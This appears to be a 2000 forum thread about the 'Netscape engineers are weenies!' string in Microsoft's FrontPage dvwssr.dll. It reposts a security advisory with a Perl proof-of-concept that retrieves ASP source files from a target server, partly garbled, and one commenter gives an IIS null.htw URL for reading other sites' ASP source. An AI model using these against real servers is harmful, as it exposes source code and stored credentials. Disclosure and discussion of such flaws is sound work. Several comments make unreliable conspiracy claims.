I could be the only one here who things this is a great thing, but so be it. I'm referring only to the fact that they claim that the flaw identifies some Netscape employees as "weenies" not the flaw it's self.

You know that there's rivalry between competing companies, and they discuss how much their competition sucks. I was disappointed after Apple directed that it's coders stop putting in Easter eggs, and their own names in products, and I was worried that this would keep other people from doing things like this. It's good to see this habit is still there from the days of old.
I think some peoples complaints about this are a bit exaggerated because it's M$. If Netscape or anyone else tossed in an insult about MS somewhere (and you what I'm talking about Rick :-)) I'm sure it wouldn't be received with such hostility. I think it's great, and I'd be flattered if MS went out of their way to describe myself or my coworkers as "weenies!"

Here's the scoop-

[Jafa]

Take a look here
for a decent explaination. It's from Russ Cooper from NTBugtraq, who usually has some pretty good contacts. Basically, the exploit is not as far reaching as people think. The attacker needs to already have permissions to edit a website on the server. Then they can change another user's site.

Jason

yet more info- string now related to backdoor

[Jafa]

Here's a blurb from Russ Cooper , NTBugTraq editor. It about sums up this hype pretty well:

Ok, so let's deal with this.

This text string, "!seineew era sreenigne epacsteN" is embedded in the dvwssr.dll that contains the vulnerability just discussed.

The question raised is what is this string for, and is it a secret backdoor password. At least that's what the media seems to be hyping up.

My information says that this string is used to obfuscate file names requested via the dvwssr.dll. Nobody seems to know why they're obfuscated at this point, but it does not represent a password". Its a piece of static data used in the obfuscating process is all.

FYI, it was put into the program sometime in 1995, when the program was first released, and definitely not in the "height of the battle between Netscape and Microsoft".

If you get this string to do anything for you, please let us know. The fact that the .dll has a vulnerability in it which permits anyone with web authoring permission to get access to files on other sites on the same box may have led the discoverer to believe that it was a password to enable that "functionality". My information says the two things are unrelated, the vulnerability exists whether you know the string text or not.

Let us not make another "NSA backdoor" out of this unless/until someone can actually prove a claim about it.

Cheers,
Russ - NTBugtraq Editor

Re:Ye gods.

[FauxPasIII]

> !pu dekcuf sreenigne tfosorciM

Okay, you get a +1 funny for you signature alone ;-)

Re:Ye gods.

[FauxPasIII]

*sigh* /me forgets you can't post and moderate in the same thread... what a stupid rule.

NT Bugtraq

[AugstWest]

It's good of Russ to have get a public statement out there, but I've yet to see anything about this actually *on* NT Bugtraq.

Personally, I'd rather see statements sent out to his subscribers than to other press outlets. Go ahead, call me crazy.

Re:So what does the file do then?

[AugstWest]

Good to know. But does this mean that after deleting the file you can no longer do FrontPage authoring? That's kind of the point of having them there in the first place...

Jkatzman

[Bob+Ince]

Nah, it just looks like a revision attribution header to me. Hang on.... Jkatzman???

Jon Katz works for MS shock!!!

Seriously, I'm really craving some fact about now. We've got three reports from newspapers, two of which are re-runs of the original one, and all of which are from mainstream sources not historically always 100% accurate with technical matters.

Judging my Microsoft's description of dvwssr.dll, it's there to allow authorised users to download the ASP source of a page; therefore, the break-in potential is on a par with the ::$DATA exploit that some webmasters have not yet fixed. Wise script authors try to avoid putting sensitive data (eg. database login details) in scripts, but there is still potential for break-ins.

But we still don't know if this is exploitable. I haven't got a FrontPage client or server here to try it on, but someone must be able to have a go. Why is there still no word from Microsoft? We'll all look rather silly if we've been ranting here about a simple hidden message. Hell, I hide daft quotes and stuff like that in my binaries all the time, specifically for hackers to find.

--
This comment was brought to you by And Clover.

Re:Jkatzman

[Bob+Ince]

We've got three reports from newspapers, two of which are re-runs of the original one

Update: here's another re-run, this time from The Register.

They include an attribution of identification to .rain.forest.puppy, who has, as they state, successfully indentified other NT hacks (most recently problems with RDS). So it seems this problem is probably real.

Shit.

However the code got there... if this didn't get spotted my QA, I am flabbergasted at the incompetence. If this did get spotted and was let through, I am flabbergasted at the unprofessionalism. Either way, MS are going to receive a whole bowlful of flabbergast.

I'd just like to make this point again: what I want from a web server is the ability to read HTTP requests and either read a file or call a CGI script. It should support SSL, and chunked transfer-encoding, and be fast. That is all I need.

I do not want a web server to:

• have extensions to let me upload pages through HTTP; FTP is perfectly good for that thank you very much.
• do authentication; my scripts can handle that perfectly well thanks, and I don't appreciate servers fiddling with my headers and messing it up by trying to take control. IIS and Apache both think their own authentication methods are sufficient, but for any web application involving dynamic users, it's not. IIS is particularly amusing in this regard, using the NT userbase.
• listen to any kind of protocol that isn't HTTP or HTTPS.
• include by default all kinds of esoteric features, like IIS's selection of ASP, HTR, IDC filters, which have proved to harbour exploitable bugs.
• include by default examples, documentation and administration tools as live, publically accessible web sites. (IIS putting its documentation in a format that needs IIS to be actively running and in full working order to be able to read is particularly good.)
• have custom error pages set up by default that prevent authentication and redirection from working.
• think it can handle cache control better than me.
• non-optionally install a bunch of system utilities without giving any idea what they do.

Bloat begets bugs. I just want a simple web server.

--
This comment was brought to you by And Clover.

Re:Affects "almost every Web-hosting provider."

[andkaha]

They should have added "using non-free server software" after that...

Re:Odd?

[andkaha]

No, not odd at all, just incomplete.

You have to delete a lot more than one single file to get all the bugs out...

less than 21% of servers

[lovebyte]

According to netcraft, Microsoft web servers represented 20.93% in March. So that's not most servers as someone else said. Moreover I have found nothing yet on Microsoft web pages about this "bug". It's interesting to check Microsoft security bulletin page to see how long they will take to answer.

Here's Rain Forest puppy's release from the Win2k

[Tweezer]

Here it is. Not too much of a problem unless your authoring permissions are messed up or your hosting multiple domains.

----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------

"Netscape engineers are weenies!"
A back door in Microsoft FrontPage extensions/authoring components

------------------------------------- Alf Serer / alf@at.clientlogic.com
- rain forest puppy / rfp@wiretrip.net

Table of contents:

-1. The short
-2. The long
-3. The code

------------------------------------------------ --------------------------

"...we love a good conspiracy theory as much as the next person..."
- secure@microsoft.com

------------------------------------------------ --------------------------
UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA
------------------------------------------------ --------------------------

--[ 1. The short

The NT 4 Option Pack ships with a particular ISAPI .dll in
/_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft
FrontPage extensions (the version I have is 3.0.2.1105). This particular
.dll allows you to read .asp (and .asa) files under the web root,
providing you know the 'password' (obfuscated encoding scheme) of which to
ask it. And, as implied by the title, the constant key used in the
encoding is "Netscape engineers are weenies!".

I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to
be used with InterDev 1.0. Therefore deleting it will affect InterDev
1.0's 'View Links' function. Also, the default permissions don't allow
for anonymous users to use the .dll--however, anyone with web authoring
can, and I've seen few sites that have allowed permission (which is more
due to a misconfiguration on their part). As Microsoft has told me, the
immediate problem is moreso the fact that any developer of one particular
virtual site can download the .asp code of other virtual sites on the same
system.

--[ 2. The long

In the fairly recent light of Mr. Cuartango's finding of a backdoor in the
authentication of Microsoft installation packages, Microsoft
(secure@microsoft.com actually) stated to Bugtraq that the automatic
acceptance of Microsoft packages is to "improve our customers' experience
while downloading software from Microsoft web sites."

Well, so let me relate how Microsoft has included an ISAPI .dll as part of
the FrontPage extension package/Option Pack/Visual Interdev, to "improve a
hacker's experience while downloading software from your web site".

I was contacted by Alf Serer (alf@at.clientlogic.com), who indicated to me
that dvwssr.dll looked like it was a backdoor, and that it contained the
string 'Netscape engineers are weenies!'(although, it's found backwards in
the .dll). Being the curious pup that I am, I decided to take a look.
Using some prior research code attempts at cracking the encoding algorithm
(herein referred to as the 'weenie algorithm'), I used a test ISAPI app
Alf sent to figure out what the hell this thing was for, and what it is
supposed to do. Searches on Microsoft's site said it was to 'verify
URLs'. However, I could not find any references to it elsewhere, and even
decompilation of the various FrontPage extension applications, FrontPage
clients, and Interdev clients yeilded no calls or references to dvwssr.dll
that I could see; however, I was later told that Interdev 1.0 requies this
.dll. Microsoft's site had dvwssr.dll down on the manifest for various
FrontPage packages/installations.

So, taking a peek at the .dll versions, I see that the other ISAPI .dlls
that make up the core of FrontPage extensions are of version 3.0.2.1105,
while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was
recently introduced into the pack by Microsoft (if you don't know,
FrontPage was an original program developed by Vemeer Technologies Inc;
hence the _vti_ prefixes.) Granted, maybe it's possible that Vemeer
engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers
left it in there. You would think some sort of Q&A and/or audit would
catch it if it already existed...

I'm not going to get into the exact details of the weenie encoding
algorithm--after all, you have the code below. It's basically a 62
character slide-rule type of encoding.

Luckily, from my auditing, this is not included with any other versions of
FrontPage (including Unix), and in the versions I found it on, ACLs
prevented its use (only System and Administrators were allowed full
access); I was told by MS that only individuals with web authoring
permission can use it, which is more than I had originally thought. But
it's not as widespread as, say, RDS. ;)

Regardless of it's actual purpose, or Microsoft's intent, I think the core
interesting issue is that Microsoft literally coded (or allowed) a .dll
who used a static key such as 'Netscape engineers are weenies!'.

In any event, if you don't use Interdev 1.0, you can delete the file and
call it a day. If you do use Interdev 1.0, well, it's your call, but I
suggest an upgrade.

--[ 3. The code

#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host /file/to/retrieve/source
#
use Socket;

$ip=$ARGV[0];
$file=$ARGV[1];

print "Encoding to: ".encodefilename($file)."\n";
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($fi le)." HTTP/1.0\n\n";
print sendraw($url);

sub encodefilename {
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789";
#
#

my $key="Netscape engineers are weenies!";

#
#
my $kc=length($from);
my ($fv,$kv,$tmp,$to,$lett);
@letts=split(//,$from);
foreach $lett (@letts){
$fv=index $slide, $lett;
$fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
$kv=index $slide, substr $key, $kc, 1;
if($kv>=0 && $fv>=0){
$tmp= $kv - $fv;
if($tmp = length($key)){ $kc=0;}
}return $to;}

sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}

--[ 4. The End

I know this is short and not with it's usual flare. I apologize...I have
been running around like mad, and basically don't have the time or energy
to expend into this. :/

- rain forest puppy

Special thanks to Alf Serer, the founder of this bug; also, special thanks
to attrition.org (especially McIntyre) for helping me wrangle this. I'm
currently in the UK, so if you have immediate questions, I suggest you
send an email to Alf or the Attrition staff (staff@attrition.org).

Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary
Roesch, and others, at CanSecWest, May 10-12 in Vancouever, Canada. More
info at www.dursec.com.

------------------------------------- Alf Serer / alf@at.clientlogic.com
- rain forest puppy / rfp@wiretrip.net

Regardless if Netscape engineers are weenies, Microsoft engineers
are definately pompous

----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------

Related: A Bug in IIS exposes ASP Source-Code!

[try67]

Try the following URL on any .asp file running on a M$ IIS Server -
http://www.yoursite.com/null.htw?CiWebHitsFile=/yo urfile.asp%20&CiRestriction=none&CiHilit eType=Full
Microsoft published a patch for it, but i'm still able to get most Source-Codes of the net's most popular sites w/o any problems...
Enjoy!

It's not a backdoor it's a BUG--READ THIS

[ecampbel]

Please read this ZDNet story:
http://news.excite.com/news/zd /000414/15/doubt-cast-on

As you'll see this is nothing more than a bug in an older version of Microsoft's software. The artilce states, While reports focused on a phrase -- "!seineew era sreenigne epacsteN" or the backwards spelling of "Netscape engineers are weenies!" -- which was present in the DLL, that's a red herring, said Cooper, adding that the phrase is not a password, but a cypher key used to scramble the address of Web pages requested by users..

Re:What took so long?

[TheCarp]

Bizzare....I almost never have apps under linux
crash on me...been using it exclusivly for the
past 3 years too.

The exceptions are netscape (which is a pile of
shit...but the best pile of shit I can find). Tho
netscape crashed 3 times as much as it does now
when I left Java and Javascript turned on, and 6
times more when i ran windows and left them on.

Course...I have had Kernel crashes. In fact the
linux kernel crashes for me more often then most
applicationes (which never crash). Of course,
thats on the order of once or twice every 6
months of continuous use. (I was getting alot of
crashes about 3 months ago...went away...may have
been a buggy program that was accessing hardware
directly...Ie X)

Interestingly...its never crashed on my other
machines...probably a hardware problem I would
guess...

Still better than Windows where I was lucky to
get 2 days of uptime...a couple of hours was much
more common. Course...I havn't used it in 3 years
now. Don't miss it.

-Steve

(btw kernel crash means no response, not even to
alt-sysreq - which I leave turned on - and can't
even ping from another terminal.)

Re:What took so long?

[TheCarp]

I have to agree and disagree. Certainly there IS
an expectations difference. However, Linux is in
general MUCH more stable than windows. I know from
first hand experiance, both as a windows user, a
few years back, a PC technician, a year ago, and
a Linux sysadmin (current).

As a desktop, my linux boxes have average uptimes
of 50 days or more. Its Much more common for me to
have a hardware failure than a kernel crash
(except on this box...even so, I have 48 days
uptime on it...)

We use Linux for some of the servers at work. I
have never seen them go down (in fact, while they
have never crashed, in the time I have been there
our big Compaq Alpha running DEC Unix has gotten
itself wedged in ways that the only way it could
be fixed was to crash it and reboot at least
twice and our other big Alpha has done only
marginally better.
(admittedly there is a major load difference, the
linux servers do not usually have 400 simultaneous
logins)

SO yes, there is an expectations difference.
The Microsoft products look "professional" and
generally fail to make the grade (don't anyone
try to tell me windows is actually very stable,
I have used it and fixed it for others myself, it
does not stand up to normal real user use)

On the other hand...while linux is "rough around
the edges" and has a steeper learning curve, it
is much more stable on the whole. It tends to
exceed expectations.

As a friend said when he realized it was time to
stop running windows..."You have to expect that
a computer is going to crash...oh wait..no thats
wrong, you shouldn't have to expect it will crash.
What bullshit, theres no reason for it to crash so
much"

Re:Not MS policy

[spiralx]

Perhaps so. But does that make MS look better, or worse?

Depends on your perspective I suppse - you could argue it either way. This level of incompetence in such a serious project for MS - given their push to dominate the server business - would seriously harm their credibility in the market, and could lose them a lot of business and the trust (don't ask me why) of a lot of current clients. They will now be wary of other holes as you say, and I agree that, intentional or not, this will be a huge blow for MS.

Heads will be rolling at MS's programming team - they'll be needing plenty of scapegoats for this one :)

Re:I know the phrase...

[guran]

/global.asa is where you put session variables and global event handlers for IIS.

Things like user validation scripts, userID/PWD for that database on the "secure" server next door.

If you (the IIS developer guy) know what you are doing, a hacker reading your global.asa is no big problem. If you count on that nobody will ever see that source (aka security through obscurity) You are in big trouble.

Sort of like putting your login script on the web.

Might be a feature after all... (Re:Not MS policy)

[bero-rh]

The article states Windows 2000 is not affected,
so here's the only reason why anyone should update to Windows 2000 and pay yet another $1,000,000,000 to M$ and its hardware partners...

IE 5.0 _does_ have a real easter egg!

[athmanb]

Add the language 'ie-ee' to your language settings and move it all the way to the top.
Then press the Search button (make sure the function hasn't been modified by your ISP), and press Customize (or whatever, I'm only familiar with the german version of IE)

Then, you'll get a Godzilla type lizard being squashed by a IE logo.

Re:Oh dear....

[setantae]

Is it me or is Microsoft getting worse at realising security flaws in their own software? :)

Realising? Discovering?

There are a large number of people here who think that this is just a bug that's been discovered!
It's a security hole that has been deliberately engineered and designed into the server.
This is absolutely outrageous and makes me worry what else they are likely to do:

"Whoops! We accidentally intercepted your credit card number and bought ourselves a helicopter, but we guess you'll put up with it because you forgive us everything."

Re:Russ Cooper says "NO VULNERABILITY"

[Ru610]

Well, there was a reply to the above post on ntbugtraq by Gerardo Richarte who says that there is a security hole in the dll. The exploit code is included in the post.

links to the technical info

[JackiePatti]

The news sources are apparently not entirely correct about there being a back door. Here are links from some of the folks actually investigating the problem. http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=2576 http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=3016 http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=3152 http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=3251

Re:This bug report is BOGUS! (moderate up!)

[bad-badtz-maru]

Oops, the shift key stuck and accidentally submitted a blank form. Anyways, this poster is correct. Not only does the password have nothing to do with any possible exploit, nobody is actually able to reproduce the exploit, making the entire media-hyped report seem inaccurate at this point.

Jeff

Re:Affects "almost every Web-hosting provider."

[kkeller]

he NT shit is a necessity due to corps requiring it.

Why don't you just drop NT and those customers, so that you can concentrate on being a Linux- based web provider? The money you lose will repay itself in the headaches you'll get rid of when you trash NT. Plus, you'll be able to target customers who want Linux: "We don't run NT! We specialize in Linux!"

--Keith

it's for crypting/decrypting. VI6 has it also

[Otis_INF]

Visual Interdev 6 contains a dll, MDT2LV.DLL, which also contains the string. Apparantly to keep compatible with old visual interdev 1.0/old frontpage extensions websites. According to my dissassembled dvwssr.dll, it's used to crypt/decrypt the querystring passed to it by the requestobject.

Not a backdoor for sure. It's just now EASY to sniff traffic to a website, from an visual interdev 1.0 client/frontpage 1/2.0 client to a webserver with these extensions, decode the strings, then possibly get the username/password and THEN brake in.

Visual Interdev 6 uses a different scheme to communicate with the server, so it's just for old visual interdev 1.0 users (are there any left?) and old frontpage users who are vulnerable.

so NOT a backdoor. stop the presses.
--

How is a string backwards a backdoor?

[Otis_INF]

A string backwards in a certain dll. It's suddenly a password... is it? and for what? The dll itself doesn't export any functions except HttpExtensionProc to serve IIS as an isapidll.

From MSDN:

The FrontPage Extensions manage design-time Web permissions using the underlying security model of the host operating system on the server. Here we consider only the case where this operating system is Windows NT 4.0 with the NTFS file system.

FrontPage manages administer and author access to a Web using the same technique. In the Web's root directory, FrontPage creates a directory named _vti_bin. Within this directory it creates two sub-directories, _vti_adm and _vti_aut. Within _vti_adm FrontPage places a file, admin.dll, and within _vti_aut it places two files, author.dll and dvwssr.dll. These DLLs are ISAPI extensions. During design-time, client requests arrive over HTTP at the server and are routed to one of these ISAPI DLLs. A request to perform an administrative function, for example, change permissions on a Web, is handled by that Web's admin.dll. A request to perform an authoring function, for example, open a Web, is handled by that Web's author.dll. A request to fetch the source code for an ASP file without processing, for example, to view the links in that file, is handled by that Web's dvwssr.dll.

In the request, the client provides credentials that identify the user who is logged in to the client workstation. This user must have read permission (equivalent to read and execute individual permissions) for the DLL handling the request, otherwise the request is denied. Thus FrontPage restricts who may perform a given request by controlling read permission on the directories in _vti_bin. Whenever a change is made to a Web's permissions via the Web Permissions dialog box, the FrontPage Extensions on the server modify the ACLs on the directories _vti_adm and _vti_aut in that Web's _vti_bin directory accordingly.

Note FrontPage does not change ACLs on content files to manage design-time security; it only changes ACLs on the directories that contain the gatekeeper files admin.dll, author.dll, and dvwssr.dll. FrontPage manipulates content file ACLs to manage run-time security.

So it CAN be that there is a backdoor in the DLL, if it surpasses the checks on ACL's on the files to be accessed. If you delete the DLL, you can't edit the pages ONLINE via MS Frontpage. The reason some people use Frontpage extensions is because of this. It's highly recommended to use OR the much more secure VIdev Online edit/publish functionality, or just edit offline. (duh:)).

So, deleting the file won't harm runtime behaviour, it will harm edit behaviour with MS Frontpage. Well... now that's a bummer ;)
--

Taking a bomb on a plane

[luckykaa]

I think the idea is based on the concept of taking a bomb on a plane, so that you know that if there is a bomb, you have it and you know you won't set it off.

The idea here is that since there are going to be n security flaws, Microsoft might as well know where they are, so they put in deliberate ones.

Re:What took so long? - MS's Forced Migration�

[Yardley]

Have you purchased the latest version of Microsoft's Forced Migration(TM)? It has nifty new features like fixes for some of the bugs in the last version of MS Forced Migration(TM). Without question it is a much better piece of software than Forced Migration 95(TM) and Forced Migration 98(TM). We have even fixed some of the bugs we intentionally placed in the previous code in order to give you a better user experience. Microsoft has been working hard to innovate every aspect of Forced Migration and we hope that the motivation to buy the latest release will come to you soon!

Re:ESR is wrong?? - not entirely...

[Ron+Harwood]

Ah, but the peer review that takes place is by external groups, no doubt. No one who has a vested interest in the software being made available quickly.

Heck the company I work for has a QA dept. that is great and doesn't care how long they delay things.

The company I used to work for is run by Steve Barkto (it's an alias, do a search - actually here I did one for you) and often the QA dept. there would be rushed... much to the chargin of others later. No suprise considering the leader is former MS.

Grounds for Netscape to sue ?

[Salsaman]

IANAL (;-) but I wonder if Netscape would have a defamation case against M$ if they brought this to court ? After all, it has now been proven that M$ published something which defames their engineers (albeit slightly cryptically). Anybody care to comment ?

Re:Heaven's Gift? -- Nope

[Fishstick]

He took it down.

here's the e-mail I exchanged with him...

At 10:28 AM 4/14/2000, you wrote:
>I have to tell you, I quite a bit dissapointed by this
>commentary:
>
>There are scary implications here. When you cannot
>trust software made by one of the world's largest
>software companies, what do you do when if comes to
>all the little homebrew progams that are available?
>
>I don't know if you were expecting to get flames on
>this or not, but...
>
>Indeed there are scary implications, of relying on
>closed-source proprietary software for
>mission-critical applications like web serving, not in
>comparing the relative trustworthiness of the "world's
>largest software companies" to "little homebrew
>programs". Maybe I'm taking this the wrong way, but I
>take offense at this as it seems to imply that some
>betrayal of trust by Microsoft makes software created
>by private individuals even less trustworthy.
>
>Shame on you.

This was not actually the intent of that remark at all, but I can
definitely see the concern. considering that, along with the fact that
we
generally don't make such comments, I removed the remark.

Thanks for bringing your concerns to my attention, my apologies for any
offense taken.
--
Stephen Heaslip (Blue)
http://www.bluesnews.com/
All the carnage, no messy cleanup...

What motivates high quality?

[Klync]

All the posts above make some good points, but the topic is being discussed as if the question is "How much should a software firm focus on Quality Assurance?" I'd rather get all philosophical and open up a broader question: "What does it take to get people/organizations to produce quality work?"

I think all the open-sourcers(?) know that, despite all the argument over tangible benefits of open source development (in software or civil engineering), one thing that is guaranteed by this system is a true, deep-seated interest, maybe even passion, for the work that is being done. The profit motive puts the actual product way lower on the worker's priority list: after the paycheck, the career advancement, etc.

If you ask me, M$ software (to keep slagging on the obvious target) is comparable to those cheap plastic toys that are produced on the wings of a new fad. The idea for the product starts in the marketing department, with the hope of riding the wave of some new fad. The product needs only to be as good as it takes to convince people to buy it: there's no committment to the longer-term. Now, when a civil engineer designs a bridge, I'd bet that s/he has a vision somewhere in the mind of people viewing that bridge fifty years from now and going "Now that's a good bridge!" GPL+(value-added-services) is one way to provide a "niche" in the economy for people who are motivated by their visions. But, as we've all heard, everyone must be a salesman in the 21st C. This is how we survive in the "dog-eat-dog" world.

Now, I realize that I've been going off on tangents, but I guess the main thing is: this isn't a question about programming, or, hell, even strictly about business models. It's about how we relate to each other, and about what motivates us to do the things we do. Open source programmers are accomplishing two things at once: they're creating cool, cheap software, and they're changing the whole logic of group decision making. The result: a superior product at a competitive price.

Re:Heaven's Gift? -- Nope

[gilroy]

Quoth the poster:

No, this isn't Heaven's Gift, it's Satan's Blessing. Too many people see Microsoft as the sort of God of software and when your God fails you, where do you turn? Certainly not to the meek.

Yet on the other hand, the meek shall inherit the earth ... yet another piece of avant-garde revolutionary counterintuition.

"And the geek shall inherit the Net..."?? :)

How often...

[|Soc|]

How often is there a MS peice of software that isn't released without a back door? How else do we expect Billy G to take down sites against him? But, Honestly, i am not surprised. There web servering applications aren't always the most secure, and anything being access by the net has the potential to be insecure. MS are just better at it than others.

Closed code sux. Now, how were DES S boxes picked?

Oh sure, we have the source code for DES, but it's packed with tables and tables and tables of magic numbers. How were they chosen? Why is there a 14 at row 1, column 1, of table S1? The how and why of S box determination is ***still*** classified to this day. Until I know how these numbers were chosen, I have no choice but to assume that it ebtails some sort of back door to let Feds (or some lucky h4xx0r who stumbles upon the back door) quick and easy access to my data. Because of the potential of a very quick unrraveling of DES security, having everyone rely on it (esp. the world's banking systems) is setting the world up for disaster. "Not cracked yet" is not a sufficent proof of a crypto-alg's security. This could be just like Microsoft.

Re:Heaven's Gift? -- Nope

[Hrunting]

This is a quote from the leading online gaming source, Blue's News.

There are scary implications here. When you cannot trust software made by one of the world's largest software companies, what do you do when if[sic] comes to all the little homebrew progams that are available?

This is exactly the mentality that keeps open-source from advancing. As strange as it may seem, the corporate world does not see open-source software go through the same sort of rigorous QA that (they assume) corporate products go through. An event such as this is only going to serve to make people doubt more software in general and that has a negative effect on open-source software which already has to face the FUD about its quality.

No, this isn't Heaven's Gift, it's Satan's Blessing. Too many people see Microsoft as the sort of God of software and when your God fails you, where do you turn? Certainly not to the meek.

AP article on this

[Barbarian]

Since a link is only been given on the Wall Street Journal (pay site), Here's an associated press article on this:

http:// wire.ap.org/APnews/main.html?FRONTID=TECHNOLOGY&ST ORYID=APIS73RF7J80

Sorry to weasel into a reply to the first comment here with this...


--

Audio Interview with Rain Forest Puppy

[Col.+Klink+(retired)]

InternetNews Radio (http://stream.internet.com/)
has an audio interview (April 14, 2000) with Rain Forest Puppy who discovered and was able to exploit the backdoor.

Note: Available as an MP3!

Re:actually...

[DiningPhilosopher]

Absolutely. And don't forget to further fortify it by XOR'ing it a few times with a long string of zeroes.

Security through marketing

[ZamZ]

To my mind the most worrying part about this is that MS discover a possible critical security problem and its users get to hear about it only as a leak to the press.

One of the biggest endightments of proprietary commercial software is the fact that when a problem is doscovered the first people to move into action from the the company concerned are the marketing department, usually in full denial mode.

What users need is an immediate alert that a problem exists, followed by a fulfilled promise to get a technical team on it until its resolved, after which a release will be made ASAP. What they get is 'There is no problem' then 'Ok, theres a problem, but its not that bad' followed belatedly by 'Alright, it was a major issue, but look the fix is here now. Just pay for the upgrade'

With open source the answer might be 'We'll work on it as soon as we can' but at least theres no denial phase.

Usually there are all sorts of get out clauses in software licenses to excuse a company from any liability for problems that bugs might cause, but what about the case where a problem is discovered by the company that could be potentially fincancially damaging to its clients but it refuses to issue notice of the problem in a timely fashion?

ZamZ

Don't be too complacent.

[hey!]

I pretty much agree with your sentiment, it was incredibly unprofessional.

On the other hand, I don't think open source is completely immune to this either -- after all, don't they have code reviews at Microsoft? Nothing really prevents a Red Hat engineer from doing something equally stupid. For that matter, the backdoor in question is not necessarily in the official source, is it? It could have been slipped in in binary form.

You can't be absolutely complacent, unless you both compile everything on your system from source and review all the source code before compiling. Even then you can't really be sure without dumping the object code (remember the old Unix password hack built into the C compiler?).

If you consider most root exploits such as the one that came out in bind last year, most of them are bugs. It wouldn't be too hard to deliberately introduce such bugs so they would pass casual inspection. Another proof that whoever did this was an idiot.

Open source's advantages over closed source for security are relative, not absolute. As in bug fixes, things can be disocvered faster and fixed faster.

Just found another story...

[Gompers]

http://www.nytimes.com/a ponline/f/AP-Microsoft-Password.html...still not very in depth..

Odd?

[cdlu]

Doesn't it strike you as odd that removing a file is a bugfix?

Questions arise: 1) Why was it there? 2) What will removing it break? and 3) What the heck kind of bugfix is deleting a file in the first place?

"My kernel is panicking on boot!" "Delete /vmlinuz, it'll work after that."

I will never fully understand Microsoft Corp., its methods, or its software.

Microsoft: bringing you yesterday's technology tomorrow.

Could this "discovery" be deliberate?

[addison]

Hrm.

According to the stories, Frontpage 2000 on Windows 2000 isn't affected.

As The Register puts it, per the link above:

The problem isn't there in Win2k servers with FrontPage 2000 extensions, so an upgrade might be a good idea. But not necessarily to Win2k.

Hrm.

Ok, Windows 2000 isn't jumping off the shelves. Problems are grounding it. So... maybe its time to "leak" a old backdoor, so that people would upgrade to 2000 ASAP?

Granted, those who thought would be saying "What problems will we have there" - but by and large - the people who think aren't running NT (especially for webserving).

(Not an NT bash, BTW. I'm talking about the vast majority of tossed-up NT servers who fill needs, and then massive effort is spent _fixing_ problems, performance, etc, rather than sitting down, building a good solution, and doing it right. (Personal opinion, NT shouldn't be there, but in those cases, some valid cases can be made for NT).

I just... Surely not. Surely this is just a coincidence. But... I've *got* to wonder..

Addison

Uh ...

[truefluke]

*If* this is true, this is supposed to be representative of a responsible and respected company? And why only one thin report on something so serious? IF this is true, I still don't understand how Microsoft thinks they have any business releasing software with Internet functionality anymore. Intranet, sure. Internet? No way.

Not MS policy

[spiralx]

Okay, this is a truly bad hole in Microsoft's server software, and one which should never have been there in the first place. And while many people here may scream conspiracy, I don't think that it was. Rather I think this was a case of coders doing something without the knowledge of the designers / policy makers or whatever.

Think about it. Why would Microsoft want this put into their software, when if it was found out, which would be likely, would lead to a massive publicity scandal, and possible legal action? This wouldn't be in their best interests at all, especially given the current events.

Rather, this sounds like the sort of thing coders would do, especially the part about Netscape employees being "weenies". Given that MS employees are loyal to MS, this kind of thing sounds like something they would choose on their own, just because they thought no-one would notice it.

Re:Not MS policy

[Black+Parrot]

> Rather I think this was a case of coders doing something without the knowledge of the designers / policy makers or whatever.

Perhaps so. But does that make MS look better, or worse?

The MS web documentation (see link in my top-level post) indicates that this file is the "gateway" that decides what incoming HTTP connects are allowed to look at. If a rogue programmer can slip a backdoor into a security module, what else is going on in other parts of the system?

With this landing in the middle of the investigations/accusations of spyware that are now going on in France, the EU, and elsewhere, I suspect that history will refer to this as the Easter Revelation that killed closed source software.

To a French diplomat, it does not matter whether a backdoor was planted by the NSA, Microsoft, or a rogue employee. What matters is whether there are any backdoors in his software at all.

--

spectacular

[Kmon]

Thrilling. I love it. The greatest thing is that I'm sitting here with dvwssr.dll open in a text editor. The password is stored in cleartext. Backwords, yes, it took me a full thirty seconds to find it. Oh yes here it is:

!seineew era sreenigne epacsteN

You think they could've, I dunno, ENCRYPTED IT? I mean, its one thing (unscrupulous as it is) to put a backdoor in software, but its just plain stupid to store the p/w in cleartext on every machine that runs frontpage in the world.

Re:If it were open source ...

[MonkeyMagic]

...it would never have been there in the first place. Most of us would be embarassed to open up such obvious flaws in our code - peer review would never have let this happen.

Re:What took so long?

[Masked+Marauder]

Why was it discovered now? Maybe the recent release of Win 2000 has something to do with it. If I ran a business with NT or '98 this would sure be an incentive for me to buy their new backdoor-free software! Yessire Bob!

What I find odd is that the article says the perpetrator is as yet unknown. Does MS allow anonymous submissions to its core products? That is truely astonishing.

First time for nothing.

[ssooyy]

Oh yeah, like this hasent happened before. I hear that microsoft has a deal with the CIA to install remote servers on all computers. So now the CIA can steal our porno!

Re:First time for nothing.

[Kmon]

Oh yeah, like this hasent happened before. I hear that microsoft has a deal with the CIA to install remote servers on all computers. So now the CIA can steal our porno!

No way, we'd catch on once we see a Linux box with a blue screen!

Re:Affects "almost every Web-hosting provider."

[gilroy]

Quoth the poster:

So M$'s bug affects Apache then? ;-P

